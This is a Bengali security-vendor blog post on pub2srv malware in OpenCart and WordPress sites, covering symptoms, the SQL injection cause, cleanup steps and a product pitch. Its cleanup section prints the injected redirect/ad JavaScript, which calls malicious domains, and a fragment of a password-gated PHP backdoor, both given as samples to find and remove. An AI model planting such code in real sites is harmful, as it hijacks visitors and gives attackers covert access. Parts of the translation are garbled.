আমরা বেশ কয়েক মাস ধরে OpenCart এবং WordPress ওয়েবসাইটগুলিকে লক্ষ্য করে pub2srv malware সংক্রমণ দেখে আসছি ৷ এটিকে সাধারণত pub2srv malware সংক্রমণ হিসাবে উল্লেখ করা হয় কারন তা আপনার website-এর audience-দের অন্যান্য ক্ষতিকারক Domain-এ পুনঃনির্দেশিত করে। যেমনঃ
go.pub2srv[.]com
go.mobisla[.]com
go.oclaserver[.com]
deloton.com/afu.php?zoneid= site
Dolohen.com
এছাড়াও, Google আপনার Website-এ ক্ষতিকারক Link-গুলির অধীনে আপনার Advertisement স্থগিত করবে৷ তাদের মধ্যে কিছু উদাহরণ –
https://defpush.com/ntfc.php?p=1565632
https://go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1
https://mobpushup.com/notice.php?p=1558098&interactive=1&pushup=1
https://wowreality.info/page.js?wm=gr
Screenshot of a WordPress user’s help request in the forum.
গড়ে প্রতিদিন 30,000 Website Hack হয়। আপনি পরবর্তী?
খুব দেরি হওয়ার আগে Website Security ব্যবহার করে Malware এবং Hacker-দের থেকে আপনার Website-কে সুরক্ষিত করুন ৷
pub2srv malware কি? এর উপসর্গ কি?
এটি একটি malware যা Open Cart এবং WordPress site-গুলিকে Spammy web page-এ পুনঃনির্দেশিত করে ৷ যেখানে pub2srv malware web-পৃষ্ঠায় ক্ষতিকারক JavaScript code Inject করে। যার ফলে পুনঃনির্দেশ/pop-up হয়। Opencart-এর ক্ষেত্রে এটি SQL injection store-এ সৃষ্ট হয়। এর ফলে Hacker-কে database-এ ক্ষতিকর code যোগ করার অনুমতি দেয়। wordPress-এর ক্ষেত্রে, Hacker-রা payload insertion করার জন্য index.php বা functions.php file-টি পরিবর্তন করতে সক্ষম হয়।
এই Hack-এর সাধারণ লক্ষণঃ
- আপনার Website-এর audience-দের Advertisement, porn, Phishing page সহ Spam website-গুলিতে পুনঃনির্দেশিত করা হয়। কেন আপনার website একাধিক পুনঃনির্দেশের সম্মুখীন হয় তা জানতে আমাদের বিস্তারিত Blog check করুন।
- Mobile device-এ pop-up-গুলি আপনাকে App-গুলি install করতে অনুরোধ করে৷
- AJAX-এর উপর নির্ভরশীল plugin-গুলি কাজ করা বন্ধ করে দেয় (উদাহরণ: Tablepress, Datatable ইত্যাদি)।
- Google দ্বারা blacklisted বা advertisement স্থগিত করে। আমাদের Blog check করুন, আপনার স্থগিত advertisement ফিরে পান।
- উৎসে অস্বীকৃত JavaScript code থাকে।
Hacl-এর পরিণতি
এই Malware-এর অন্তর্নিহিত কারণ হল একটি SQL injection (SQLi) দুর্বলতা। একজন আক্রমণকারী যা করতে পারেঃ
- Database-এ content যোগ করুন, মুছুন, editing করুন বা পড়ুন।
- Database server-এ file থেকে source code পড়ুন।
- Database server-এ file লিখুন।
- আপনার WordPress/OpenCart website-এর ব্যবহারকারীর record এবং password চুরি করুন।
- যেখানে OpenCart/E-Commerce store- এ লেনদেনের তথ্য চুরি করুন।
- আপনার Domain-এ SEO Spam এর ফলে Google Webmasters Blacklist-এ পরিণত হয়।
কিভাবে আমার Website থেকে pub2srv malware code সরাতে পারি?
OpenCart malware সাধারণত database-কে সংক্রমিত করে এবং এর code নিম্নলিখিত database টেবিলে রাখেঃ
- oc_product_description টেবিল (পণ্যের বিবরণ)
- oc_category_description টেবিল (শ্রেণির বিবরণ)
আপনার OpenCart database থেকে ক্ষতিকর code সরাতে এই পদক্ষেপগুলি অনুসরণ করুনঃ
- phpMyAdmin বা Sequel Pro এর মত একটি Tool ব্যবহার করে database টেবিলের পূর্বরূপ দেখুন।
- ‘oc_category_description’ টেবিলটি খুলুন এবং ‘বিবরণ’ কলামে এর মান পরীক্ষা করুন।
- আপনি নীচে দেখানো কিছু JavaScript code হিসাবে Snippet দেখতে পাবেনঃ
<script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "XXXXXXXXXXXXX", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement(''script''); script.async = true; script.src=""//cdn.shorte[.st]/link-converter.min.js''; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != ''complete'' && rs != ''loaded'') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName(''script'')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]></script><script data-cfasync=""false'' type=""text/javascript'' src=""//pXXXXX.clksit[e.com/]adServe/banners?tid=XXXXX_127XXX_7&tagid=2''></script><script type="text/javascript" src="https://[go.pub2srv][.com/ap]u.php?zoneid=XXXXXX"></script><script async="async" type="text/javascript" src="https://g[o.mobisl]a.co[m/notice.ph]p?p=XXXXXX&interactive=1&pushup=1"></script>
- প্রতিস্থাপন করার পরে নিম্নলিখিত SQL code Snippet-টি চালানঃ
UPDATE oc89gWs_category_description SET description = REPLACE (description, 'INSERT MALICIOUS CODE FROM PREVIOUS STEP', '');
- oc_product_description টেবিলের জন্য উপরের সমস্ত ধাপের পুনরাবৃত্তি করুন।
ভিতরে WordPress malware-টি সাধারণত WordPress file-গুলিতে পাওয়া যায়ঃ
- index.php
- functions.php
- database টেবিল
এই পদক্ষেপগুলি অনুসরণ করুন, আপনার WordPress Server থেকে ক্ষতিকর code সরান:
- আপনার Open server-এ index.php file (public_html folder) এবং wp-content/themes/NAME-OF-THEME/functions.php
- এই file-গুলিতে Unfamiliar/Experienced/Encrypt করা code খুঁজুন। আপনি অনুরূপ code খুঁজে পেতে পারেন:
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; ?>
- আপনি যদি এই file-গুলির যেকোন একটিতে ক্ষতিকারক code খুঁজে পান, তাহলে আপনার পরিচিত ভাল Backup থেকে file-গুলি প্রতিস্থাপন করা উচিত।
- এছাড়াও, উপরে OpenCart-এর ধাপে উল্লিখিত আপনার database-এর টেবিলগুলি যাচাই করুন।
- এছাড়াও wp-vcd.php এবং class.wp.php ফাইল এর মধ্যে wp-অন্তর্ভুক্ত directory মুছে ফেলুন। তারপর post.php এর মধ্যে wp-অন্তর্ভুক্ত directory খুলুন। পরিশেষে malware দ্বারা যুক্ত করা প্রথম php tag-টি মুছুন। Theme-এর functions.php file-টি খুলুন এবং উপরের code-গুলি মুছুন।
গড়ে প্রতিদিন 30,000 website hack হয়।
আপনি পরবর্তী? খুব দেরি হওয়ার আগে website security ব্যবহার করে malware এবং hacker-দের থেকে আপনার website-কে সুরক্ষিত করুন ৷
পুনঃসংক্রমণ প্রতিরোধের পদক্ষেপ এবং কারণ চিহ্নিত করুন-
- CMS Core-এ যে কোনো পরিচিত নিরাপত্তা সমস্যা সমাধান করতে আপনার OpenCart/WordPres website সর্বশেষ version-এ update করুন।
- Block SQL injection attacks: Astra এর মতো একটি নিরাপত্তা plugin ব্যবহার করুন। যা আপনার website এ পৌঁছানোর আগেই SQL Injection (SQLi) আক্রমণগুলিকে সক্রিয়ভাবে সনাক্ত করে এবং block করে।
- Admin account-এর ব্যবহারকারীর Name এবং Password পরিবর্তন করুন: যাতে Hacker Malware Cleanup-এর পরে আর website-এ access করতে না পারে।
- Database password পরিবর্তন করুন: যেমন Hacker database-এর সাথে সরাসরি সংযোগ করতে অক্ষম।
- Encryption key পরিবর্তন করুন: Spoofing এবং অন্যান্য Cryptographic আক্রমণ প্রতিরোধ করতে।
- শুধুমাত্র Whitelisted IP ঠিকানাগুলিতে Admin area access সীমাবদ্ধ করুন: যেমন শুধুমাত্র অনুমোদিত Administrators Backend Admin area access করতে পারেন।
- Unused plugin/Extension Uninstall করুন: যদি রক্ষণাবেক্ষণ না করা হয় তাহলে সেগুলিতে অবশ্যই নিরাপত্তা সংক্রান্ত সমস্যা থাকতে পারে। যার ফলে প্রথমে তা Hack হয় ৷
- Server log Scan করুন: অনেক সময় আপনি Log-গুলিতে অপরিচিত বা বিভ্রান্তিকর ত্রুটি খুঁজে পেতে পারেন। যা Hack-এর source এবং সময় নির্দেশ করতে পারে।
সম্পর্কিত নির্দেশিকা – wordpress hack অপসারণ
Astra Web Security সম্পর্কে-
Astra Web Security আপনার CMS-এর জন্য একটি End-to-end নিরাপত্তা সমাধান পদ্ধতি। যার দ্বারা শুধুমাত্র একটি button-এ click করে malware থেকে নিজেকে রক্ষা করতে পারবেন। যেখানে আমাদের Security Specialist-রা আপনার online business সুরক্ষিত করতে 24×7 সহায়তা প্রদান করে। আপনি যদি পেশাদার সাহায্য চান বা জানতে চান যে আমরা কীভাবে আপনার website 100% পরিষ্কার এবং নিরাপদ নিশ্চিত করি তাহলে নীচের Chat widget-এ message দিন!